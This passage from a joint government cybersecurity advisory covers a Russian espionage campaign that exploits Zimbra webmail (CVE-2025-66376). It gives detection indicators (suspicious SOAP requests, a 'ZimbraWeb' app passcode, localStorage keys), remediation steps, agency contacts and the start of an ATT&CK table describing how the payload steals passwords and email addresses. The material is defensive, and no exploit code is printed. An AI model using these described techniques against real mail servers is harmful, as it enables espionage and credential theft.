&lt;p&gt;This &lt;em&gt;Ulej &lt;/em&gt;capability relies on creating a significant number of SOAP requests to collect account information for exfiltration. ZCS logs from these requests are stored, by default, in the &lt;em&gt;/opt/zimbra/log/mailbox.log&lt;/em&gt; file [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ProcessAnalysis&quot; target=&quot;_blank&quot;&gt;D3-PA&lt;/a&gt;]. A significant amount of SOAP request activity that aligns with what was described in the &lt;a href=&quot;#persistence1&quot;&gt;Persistence and credential access&lt;/a&gt; and &lt;a href=&quot;#collection1&quot;&gt;Collection&lt;/a&gt; sections of this advisory could indicate a potential compromise. Specific examples of high-risk SOAP request activity might include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Many &lt;em&gt;SearchGalRequest &lt;/em&gt;command requests from a single user over a short period of time;&lt;/li&gt;
&lt;li&gt;Use of the &lt;em&gt;CreateAppSpecificPasswordRequest&lt;/em&gt; command, especially in cases where it is creating an Application Passcode named “ZimbraWeb”; and&lt;/li&gt;
&lt;li&gt;Use of the GetScratchCodesRequest command.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;While LAUNDRY BEAR uses the localStorage property to track what days had emails previously exfiltrated, defenders can use this property to identify victims of this campaign and determine the scope of exfiltrated information [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ProcessAnalysis&quot; target=&quot;_blank&quot;&gt;D3-PA&lt;/a&gt;]. Review of the items stored in that property for an organization’s ZCS webmail client page on an endpoint device could indicate compromise if there are items named with a format of &lt;em&gt;zd_comp_YYYY-MM-DD,&lt;/em&gt; as explained in the &lt;a href=&quot;#collection1&quot;&gt;Collection&lt;/a&gt; section of this advisory.&lt;/p&gt;
&lt;p&gt;While Application Passcodes have non-malicious purposes, in this case instances of these passcodes with the name “ZimbraWeb” are almost certainly malicious. The ZCS webmail application can support 2FA natively and does not require the use of an Application Passcode, so there is no reason that there should be one named “ZimbraWeb.”&lt;/p&gt;
&lt;p&gt;In instances where organizations identify victims of this campaign, they should also examine the inbox of the suspected victim for the original phishing email [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:MessageAnalysis&quot; target=&quot;_blank&quot;&gt;D3-MA&lt;/a&gt;]. If an email that has a payload exploiting &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot;&gt;CVE-2025-66376&lt;/a&gt; is discovered, &lt;strong&gt;steps should be taken immediately to identify and quarantine other instances of emails with similar body content, senders, and subject lines to prevent further exploitation and exfiltration. &amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Remediation&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;In the event an organization identifies activity associated with this campaign, that organization should take steps to minimize further exploitation. The organization should consider requesting that employees minimize use of the ZCS webmail client until the organization updates to a patched version that is not vulnerable to &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;CVE-2025-66376&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Organizations should use identifiers from the &lt;a href=&quot;#ioc1&quot;&gt;IOCs&lt;/a&gt; section of this report to identify any individuals compromised by this campaign and record the date(s) of compromise(s) to determine the scale and scope of emails exfiltrated.&lt;/p&gt;
&lt;p&gt;All users from the organization should have all Application Passcodes and 2FA scratch keys revoked. Affected organizations should require all employees to change passwords in line with establishing minimum password strength requirements [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishMinimumPasswordStrength3B&quot;&gt;CPG 3.B&lt;/a&gt;] and creating unique credentials [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#CreateUniqueCredentials3C&quot;&gt;CPG 3.C&lt;/a&gt;], specifically noting that compromised employees might have had any password stored in a password manager exfiltrated.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Works cited&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;[1&lt;a class=&quot;ck-anchor&quot; id=&quot;wc1&quot;&gt;&lt;/a&gt;] Netherlands General Intelligence and Security Service (AIVD) and Netherlands Defence Intelligence and Security Service (MIVD). AIVD and MIVD identify a new Russian cyber threat actor. 2025. &lt;a href=&quot;https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf&quot; target=&quot;_blank&quot;&gt;https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[2]&lt;a class=&quot;ck-anchor&quot; id=&quot;wc2&quot;&gt;&lt;/a&gt; Microsoft Corporation. New Russia-affiliated actor Void Blizzard targets critical sectors for espionage. 2025. &lt;a href=&quot;https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/&quot; target=&quot;_blank&quot;&gt;https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[3]&lt;a class=&quot;ck-anchor&quot; id=&quot;wc3&quot;&gt;&lt;/a&gt; Palo Alto Networks Unit 42. Russian Global Webmail Espionage. 2026. &lt;a href=&quot;https://unit42.paloaltonetworks.com/russian-webmail-espionage/&quot;&gt;https://unit42.paloaltonetworks.com/russian-webmail-espionage/&amp;nbsp;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[4]&lt;a class=&quot;ck-anchor&quot; id=&quot;wc4&quot;&gt;&lt;/a&gt; Proofpoint. TA488 Targets Zimbra Mailservers with Half-Click Exploits. 2026. &lt;a href=&quot;https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit&quot;&gt;https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[5]&lt;a class=&quot;ck-anchor&quot; id=&quot;wc5&quot;&gt;&lt;/a&gt; Seqrite. Operation GhostMail: Russian APT exploits Zimbra Webmail to Target Ukraine State Agency. 2026. &lt;a href=&quot;https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/&quot; target=&quot;_blank&quot;&gt;https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/ &amp;nbsp;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Footnotes&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f1&quot;&gt;&lt;/a&gt; Národní úřad pro kybernetickou a informační bezpečnost&lt;br&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f2&quot;&gt;&lt;/a&gt;&lt;sup&gt; &lt;/sup&gt;Forsvarets Efterretningstjeneste&lt;br&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f3&quot;&gt;&lt;/a&gt;&lt;sup&gt; &lt;/sup&gt;Välisluureamet&lt;br&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f4&quot;&gt;&lt;/a&gt; Sotilastiedustelu&lt;br&gt;&lt;sup&gt;5&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f5&quot;&gt;&lt;/a&gt;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt; Suojelupoliisi&lt;br&gt;&lt;sup&gt;6&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f6&quot;&gt;&lt;/a&gt; Direction générale de la sécurité intérieure&lt;br&gt;&lt;sup&gt;7&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f7&quot;&gt;&lt;/a&gt; Agence nationale de la sécurité des systèmes d’information&lt;br&gt;&lt;sup&gt;8&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f8&quot;&gt;&lt;/a&gt; Agenzia Informazioni e Sicurezza Esterna&lt;br&gt;&lt;sup&gt;9&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f9&quot;&gt;&lt;/a&gt; Agenzia Informazioni e Sicurezza Interna&lt;br&gt;&lt;sup&gt;10&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f10&quot;&gt;&lt;/a&gt; Serviciul de Informații și Securitate al Republicii Moldova&lt;br&gt;&lt;sup&gt;11 &lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f11&quot;&gt;&lt;/a&gt;Agencja Wywiadu&lt;br&gt;&lt;sup&gt;12&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f12&quot;&gt;&lt;/a&gt;&lt;sup&gt; &lt;/sup&gt;Służba Kontrwywiadu Wojskowego&lt;br&gt;&lt;sup&gt;13&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f13&quot;&gt;&lt;/a&gt;&lt;sup&gt; &lt;/sup&gt;Centro Nacional de Inteligencia&lt;br&gt;&lt;sup&gt;14 &lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f14&quot;&gt;&lt;/a&gt;Nationellt Cybersäkerhetscenter&lt;br&gt;&lt;sup&gt;15&lt;/sup&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;f15&quot;&gt;&lt;/a&gt; MITRE and ATT&amp;amp;CK are registered trademarks of The MITRE Corporation. MITRE D3FEND is a trademark of The MITRE Corporation.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Acknowledgements&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The authoring agencies acknowledge the contributions to this advisory from Palo Alto Networks Unit 42 and Proofpoint.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Disclaimer of endorsement&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The information and opinions contained in this document are provided &quot;as is&quot; and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.&lt;/p&gt;
&lt;p&gt;Organizations have no obligation to respond or provide information back to the authoring organizations in response to this joint advisory. If, after reviewing the information provided, an organization decides to provide information to the authoring organizations, reporting must be consistent with all applicable laws and policies.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Purpose&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Contact&lt;/strong&gt;&lt;/h2&gt;
&lt;div class=&quot;SCXW95230887 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW95230887 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;United States organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;National Security Agency&lt;/strong&gt;&amp;nbsp;&lt;br&gt;Cybersecurity Report Feedback: &lt;a href=&quot;mailto:CybersecurityReports@nsa.gov&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;CybersecurityReports@nsa.gov&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;br&gt;Defense Industrial Base Inquiries and Cybersecurity Services: &lt;a href=&quot;mailto:DIB_Defense@cyber.nsa.gov&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;DIB_Defense@cyber.nsa.gov&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;br&gt;Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, &lt;a href=&quot;mailto:MediaRelations@nsa.gov&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;MediaRelations@nsa.gov&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cybersecurity and Infrastructure Security Agency&lt;/strong&gt;&amp;nbsp;&lt;br&gt;CISA’s 24/7 Operations Center (&lt;a href=&quot;mailto:contact@cisa.dhs.gov&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;contact@cisa.dhs.gov&lt;/u&gt;&lt;/a&gt;), or by calling 1-844-Say-CISA (1-844-729-2472).&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Federal Bureau of Investigation&lt;/strong&gt;&amp;nbsp;&lt;br&gt;If you or someone you know has fallen victim to this campaign, file a complaint with &lt;a class=&quot;Hyperlink SCXW95230887 BCX8&quot; href=&quot;https://www.ic3.gov/&quot; target=&quot;_blank&quot; rel=&quot;noreferrer noopener&quot;&gt;&lt;u&gt;IC3&lt;/u&gt;&lt;/a&gt;.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Defense Counterintelligence and Security Agency&amp;nbsp;&lt;/strong&gt;&amp;nbsp;&lt;br&gt;DCSA Counterintelligence, Cyber Mission Center, Cyber Threat Operations Branch: &lt;a href=&quot;mailto:DCSA.CI.CyberOps@mail.mil&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;DCSA.CI.CyberOps@mail.mil&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;br&gt;Cleared Contactors (CCs) should contact their DCSA Counterintelligence Special Agent to report information pertaining to suspicious contacts or physical/digital efforts to obtain illegal or unauthorized access to the CC’s cleared facility/information, as required by 32 CFR 117.&amp;nbsp;&lt;br&gt;Media/Public Inquiries: &lt;a href=&quot;mailto:dcsa.quantico.dcsa-hq.mbx.pa@mail.mil&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;dcsa.quantico.dcsa-hq.mbx.pa@mail.mil&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Department of Defense Cyber Crime Center&amp;nbsp;&lt;/strong&gt;&amp;nbsp;&lt;br&gt;Defense Industrial Base Inquiries and Cybersecurity Services: &lt;a href=&quot;mailto:DC3.DCISE@us.af.mil&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;DC3.DCISE@us.af.mil&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;br&gt;Defense Industrial Base mandatory cyber incident reporting as required by 10 U.S. Code Sections 391 and 393 and Defense Federal Acquisition Regulation Supplement (DFARS) 252.204-7012 is submitted at &lt;a href=&quot;https://dibnet.dod.mil/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://dibnet.dod.mil&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;br&gt;Media Inquiries / Press Desk: &lt;a href=&quot;mailto:DC3.Information@us.af.mil&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;DC3.Information@us.af.mil&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Naval Criminal Investigative Service&lt;/strong&gt;&amp;nbsp;&lt;br&gt;To report criminal activity impacting the United States Navy, go to &lt;a href=&quot;http://www.ncis.navy.mil/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;www.ncis.navy.mil&lt;/u&gt;&lt;/a&gt; and click “Submit a Tip”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Dutch organizations&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Defence Intelligence and Security Service (MIVD): &lt;a href=&quot;https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;General Intelligence and Security Service (AIVD): &lt;a href=&quot;https://www.aivd.nl/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.aivd.nl&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Australian organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Australian Signals Directorate&amp;nbsp;&lt;br&gt;Visit &lt;a href=&quot;https://www.cyber.gov.au/about-us/about-asd-acsc/contact-us#no-back&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;cyber.gov.au&lt;/u&gt;&lt;/a&gt; or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Canadian organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The Canadian Centre for Cyber Security (Cyber Centre), part of the Communications Security Establishment, encourages Canadian organizations to report cyber incidents and to strengthen the security of their networking devices. &amp;nbsp;&lt;br&gt;Report an incident or suspicious activity to the Cyber Centre by email at &lt;a href=&quot;mailto:contact@cyber.gc.ca&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;contact@cyber.gc.ca&lt;/u&gt;&lt;/a&gt;, online via the reporting tool &lt;a href=&quot;https://www.cyber.gc.ca/en/incident-management&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;Report a cyber incident - Canadian Centre for Cyber Security&lt;/u&gt;&lt;/a&gt; or by phone at 1-833-CYBER-88 (1-833-292-3788).&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;New Zealand organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;New Zealand National Cyber Security Centre (NCSC-NZ): &lt;a href=&quot;mailto:info@ncsc.govt.nz&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;info@ncsc.govt.nz&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;United Kingdom organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Report significant cyber security incidents to &lt;a href=&quot;https://ncsc.gov.uk/report-an-incident&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;ncsc.gov.uk/report-an-incident&lt;/u&gt;&lt;/a&gt; (monitored 24/7)&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Estonia organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Estonian Foreign Intelligence Service (EFIS): &lt;a href=&quot;mailto:info@valisluureamet.ee&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;info@valisluureamet.ee&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Finnish organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Finnish Security and Intelligence Service: &lt;a href=&quot;https://supo.fi/en/contact&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;supo.fi/en/contact&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;French organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;French organizations are encouraged to report suspicious activity or incident related information found in this advisory by contacting ANSSI/CERT-FR at: &lt;a href=&quot;mailto:cert-fr@ssi.gouv.fr&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;cert-fr@ssi.gouv.fr&lt;/u&gt;&lt;/a&gt; or by phone at: 3218 or +33 9 70 83 32 18.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Italian Organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Italian External Intelligence and Security Agency (AISE):&amp;nbsp;&amp;nbsp;&lt;br&gt;Visit &lt;a href=&quot;https://www.sicurezzanazionale.gov.it/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.sicurezzanazionale.gov.it/&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Italian Internal Intelligence and Security Agency (AISI):&amp;nbsp;&amp;nbsp;&lt;br&gt;Visit &lt;a href=&quot;https://www.sicurezzanazionale.gov.it/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.sicurezzanazionale.gov.it/&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW214395380 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Moldovan organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;ListContainerWrapper SCXW214395380 BCX8&quot;&gt;
&lt;ul type=&quot;disc&quot;&gt;
&lt;li&gt;Security and Intelligence Service of the Republic of Moldova (SIS RM): &lt;a href=&quot;mailto:cybersec@sis.md&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;cybersec@sis.md&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Polish organizations&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Polish Foreign Intelligence Agency (AW): &lt;a href=&quot;mailto:ctiteam@aw.gov.pl&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;ctiteam@aw.gov.pl&lt;/u&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Appendix A: MITRE ATT&amp;amp;CK tactics and techniques&lt;/strong&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;appendixa&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#table9&quot;&gt;&lt;strong&gt;Table 9&lt;/strong&gt;&lt;/a&gt; through &lt;a href=&quot;#table19&quot;&gt;&lt;strong&gt;Table 19&lt;/strong&gt;&lt;/a&gt; for all the threat actor tactics and techniques referenced in this advisory.&lt;a class=&quot;ck-anchor&quot; id=&quot;table9&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 9: Reconnaissance&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Gather Victim Identity Information: Credentials&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/001/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1589.001&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The payload attempts to intercept a victim’s password from their password manager.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Gather Victim Identity Information: Email Addresses&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/002/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1589.002&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The payload attempts to grab the victim’s email address from various data stores.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Search Open Websites/Domains&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1593/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1593&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;This group likely leverages public information to support target development.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Active Scanning&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1595/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1595&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Port scanning can be used by this group to assist with determining exploitability of identified targets.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
